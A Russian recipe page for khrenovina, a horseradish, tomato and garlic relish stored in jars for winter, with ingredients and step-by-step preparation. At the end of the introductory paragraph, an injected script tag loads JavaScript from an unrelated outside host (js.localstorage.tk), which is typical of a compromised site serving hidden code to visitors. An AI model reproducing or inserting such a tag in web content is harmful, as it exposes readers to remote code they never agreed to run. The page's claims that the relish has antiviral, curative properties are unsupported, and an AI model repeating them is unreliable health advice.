Хреновина (хреновник) с помидорами и чесноком на зиму

Хреновина с помидорами и чесноком на зиму
Хреновина (хреновник) с помидорами и чесноком на зиму

Оценить рецепт: 

Нет оценки
Легко
30 мин

"А у вас не осталось ещё немного той вкусной хреновины?" - слышали вы такое хоть раз от своих друзей? Я вам ответственно заявляю, херновина - это не только смешное название, а ещё и очень вкусное и полезное блюдо. Готовить хреновину (второе название - хреновник) нужно осенью, в этот период как раз созревает и готов к употреблению основной ингридиент: жгучий корень хрена. Хреновина хороша к холодцу, бужанине, салу. И это не просто соус, лечебные свойства хреновины очевидны, так как в составе два ярких антивирусных продукта: хрен и чеснок. Хранить хреновину лучше в стерильных банках в холодильнике, так она сохранит все свои восхитительные качества до весны. По опыту скажу, редкая хреновина доживает до марта, обычно она съедается гораздо раньше.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Ингредиенты: 
Помидоры
1 кг
Чеснок
100 гр
Корень хрена
100 гр
Соль
1-2 ч.л.
Сахар
1 ч.л.
Хреновина. Подготавливаем ингридиенты

Начинаем с подготовки. Моем и очищаем корень хрена, работать лучше в перчатках, чтобы избежать раздражения кожи. Помидоры моем и просушиваем бумажным полотенцем, разрезаем на половинки и удаляем сердцевинку, чеснок чистим.

Хреновина. Прокручиваем овощи через мясорубку

Следующий этап - размельчение овощей. Тут Вы можете действовать на своё усмотрение. Я пользуюсь электрической мясорубкой с мелкой насадкой, но подойдёт и блендер (нужно регулировать степень измельчения, блюдо не должно превратиться в кашу), и ручная мясорубка (нужно соблюдать меры безопастности, т.к. из-за жгучего сока хрена могут слезиться глаза, лучше надеть на насадку мясорубки полиетиленовый пакет, чтобы рубленный хрен сразу попадал в изоляцию). Хрен, помидоры, чеснок измельчаем любым доступным способом.

Хреновина. Состав

Вот так выглядит хреновина в предфинальном состоянии) Осталось совсем чуть-чуть, а в этот момент самое время поставить стерилизоваться банки, если, конечно, вы этим не озаботились заранее.

Хреновина. Добавляем специи

Завершающий штрих. Добавляем соль и сахар, тщательно перемешиваем, хреновина - готова!

Хреновина. Перекладываем в банки

Готовую хреновину перекладываем банки, закупориваем (я пользуюсь крышками "твист") и отправляем в холодильник.

Итак, острая, вкусная, полезная хреновина готова! Я очень надеюсь, что этот рецепт оцените вы и ваши близкие не только за вкусовые, но и за лечебные свойства! Каждый раз, когда подаёте на стол мясо, вспомните о том, что в холодильнике притаилась хреновина...не пожалеете!

Понравился рецепт? Оставьте комментарий